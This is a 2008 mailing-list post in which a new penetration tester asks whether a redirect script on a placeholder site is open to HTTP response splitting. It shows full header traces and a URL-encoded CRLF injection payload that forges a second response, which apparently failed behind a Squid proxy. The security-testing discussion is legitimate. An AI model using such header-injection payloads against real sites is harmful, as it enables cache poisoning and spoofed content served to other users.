Penetration Testing: Is there a HTTP Respone Splitting Flaw?

[bin4ry () theknetgroup org]

Hi together,

i'm new to this community as well as to pen-testing. I'v already done some jobs for smaller companies and 
it-infrastructures.

Now i have to pen-test a website. I need  to perform a black-box-test and i've already found some xss- and some 
sql-injection-bugs which i've reported to the site admin.

Now i believe that there's a http response splitting flaw as well.

I found this suspicious ressource:



foo.bar/accept?dest=/xy/z





This looks like a redir-script, right? So this is what i get:



GET foo.bar/accept?dest=/xy/z HTTP/1.1
Host: foo.barUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily <<<<<< look suspicious
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:09:42 GMT
Location: foo.bar/xy/z <<<<<<<
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Runtime: 0.39293
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from prx-deka-02.f.ddk
----------------------------------------------------------
GET /xy/z HTTP/1.1 <<<<< thats it, right?
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "e7346ba9885de32fe8d51358b8a409af"

HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy
Via: A_PROXY
Date: Fri, 25 Apr 2008 12:09:42 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "e7346ba9885de32fe8d51358b8a409af"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS from A_PROXY


Till now evrything looks like a response splitting flaw. Thats why i pass this one to $dest:



/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E

Which is:

/xy/z

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: no-cache
Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
Content-Length: 36
<html>HTTP Response Splitting</html>



So, again our http traffic now with a injected http header:




GET 
/accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E
 HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive

HTTP/1.x 302 Moved Temporarily
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:07:47 GMT
Location: foo.bar/de/xy/z
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from A_PROXY
----------------------------------------------------------
GET /xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"

HTTP/1.x 304 Not Modified
Via: 1.0 A_PROXY
Date: Fri, 25 Apr 2008 12:07:48 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS A_PROXY


As u can see, the injected header won't be matched to the http-request from the redir-script.

I tried several crlf-types: %0d%0a , %0a%0a and %0a but as we can see this is a linuxbox therefore %0d%0a should work.

There's a squid between me and foo.bar. The whitepaper from sanctum sais that squid has a packet boundary approach and 
messages are read as packets and therefore injected headers may need 2 be padded.

Someone can help me out?

Thx

P.S.: And another question. Since i am not really familiar with response splitting, i'd like to ask you whether the 
risc of response splitting is always present when a script utilizes user-input to form a new address which is the 
target of a rediriction script, which manifests in a http 302 header from the server?

Thanks and greetings to the community from germany.

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------